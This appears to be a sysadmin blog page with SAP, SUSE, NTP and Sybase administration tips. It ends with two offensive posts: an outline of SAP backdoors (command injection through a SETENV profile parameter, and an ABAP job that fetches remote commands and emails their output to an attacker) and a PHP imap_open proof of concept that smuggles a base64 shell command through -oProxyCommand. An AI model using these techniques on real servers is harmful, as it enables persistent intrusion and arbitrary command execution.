Posts

User administration page in Solution Manager for Each Scenarrios and Use Cases and Its Respective rroles

Image
User administration page in Solution Manager.
Solution Manager has a lot of scenarios and use cases, and all of them require different roles/authorizations to be used.
We can find the template users in this administration page, together with their use-case, so we can activate and use the correct roles for the different scenario’s:
http://solman.customer.local:port/sap/bc/webdynpro/sap/wd_sise_centralusermgmt?SCENARIO=X&sap-language=EN#
Below screenshot is from Solution manager 7.2 FP 09


Kudos Stijn de Regge
//alak

Communication Between S/4HANA and an EDI Server Failed due to Inconsistent Time

1. Shutdown both HANA DB and S/4HANA Applications in S4H.customer.local
2. As user root, backup the /etc/ntp.conf file in S4H.customer.local
3. Run the ntpdate -u command to update the machine clock.
   e.g.: ntpdate -u 192.11.111.22
4. Open the /etc/ntp.conf file and add the NTP server: 192.11.111.22. Add the line below:
   server 192.11.111.22  mode 5 prefer
5. Restart the NTP Daemon using the command (as user root):
systemctl restart ntpd
6. Check the clock settings
7. Check the status of the ntpd daemon
systemctl status ntpd
7. Restart both HANA DB and S/4HANA Applications in S4H.customer.local

Kudos to Alvin Domanico and Dormal Benoit

/alak

SuSE Update Lists No Repository

Image
We need to perform OS patching for ORAC But found the SUSE connect error and no repositorieds defined. No updates can found currently.


ls -l /etc/products.d
Wrong baseproduct is defined, it should be SLES_SAP.prod
cd /etc/products.d unlink baseproduct ln -s SLES_SAP.prod baseproduct
cat /var/log/cloudregister
zypper repos
zypper lp --category security
Kudos to Stijn De Regge
//alak



Restart an SAP service internally in SAP without restarting the service itself

If we restart whole instance, users get disconnected etc, so in a case, for example, we want to restart only message server, we can eithr use MMC and All Task > Restart Service for MessageServer or more simply via command:

sapcontrol -nr 61 -function RestartService
and to check:

sapcontrol -nr 61 -function GetProcessList
Kudos to Stijn De Regge and Tibor Fenyosi for the guide! :3

/alak

SYBASE ASE - Neatly Display DB/Schema Sizes

when running isql it should have "-w999" ​ isql -Usapsa -S -P -X -w999 ​ after that here are the commands: ​ use master ​ go ​ declare @pagesize numeric(19,0) select @pagesize=(select @@maxpagesize) SELECT "DB Name" = CONVERT(char(15), db_name(D.dbid)),"DB Size MB" = STR(SUM(CASE WHEN U.segmap != 4 THEN U.size*@pagesize/1048576 END),10,1), "Used Data MB" = STR(SUM(CASE WHEN U.segmap != 4 THEN size - curunreservedpgs(U.dbid, U.lstart, U.unreservedpgs)END)*@pagesize/1048576,10,1), "Data Full%" = STR(100 * (1 - 1.0 * SUM(CASE WHEN U.segmap != 4 THEN curunreservedpgs(U.dbid, U.lstart, U.unreservedpgs) END)/SUM(CASE WHEN U.segmap != 4 THEN U.size END)),9,1), "Log Size MB" = STR(SUM(CASE WHEN U.segmap = 4 THEN U.size*@pagesize/1048576 END),10,1), "Free Log MB" = STR(lct_admin("logsegment_freepages",D.dbid)*@pagesize/1048576,10,1), "Log Full%" = STR(100 * (1 - 1.0 * lct_admin("logsegment_fr…

SAP Backdoors {placeholder Post]

This is a placeholder for future post, on backdooring SAP servers:

1. SAP profile SETENV_xx parameter
- if get local access, or SAP level access can cat or echo a line into profile parameter file
- concatenated command for SETENV_+xx param

2. Using ABAP program + SM37
- ABAP program to fetch comamnd from a remote server (HTTP-GET ABAP Function Module)
- schedule job every 2 minits interval
- for that job, set spool recipient to remote attacker email so output can be sent over
- Pre-req: SCOT configuration, Auth for SM36, SE38

to be continued..

//alak

Bypassing PHP’s Disabled exec()

Source: https://github.com/Bo0oM/PHP_imap_open_exploit
<?php # https://antichat.com/threads/463395/#post-4254681 # echo '1234567890'>/tmp/test0001 $server="x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}"; imap_open('{'.$server.':143/imap}INBOX', '', '') ordie("\n\nError: ".imap_last_error()); ?>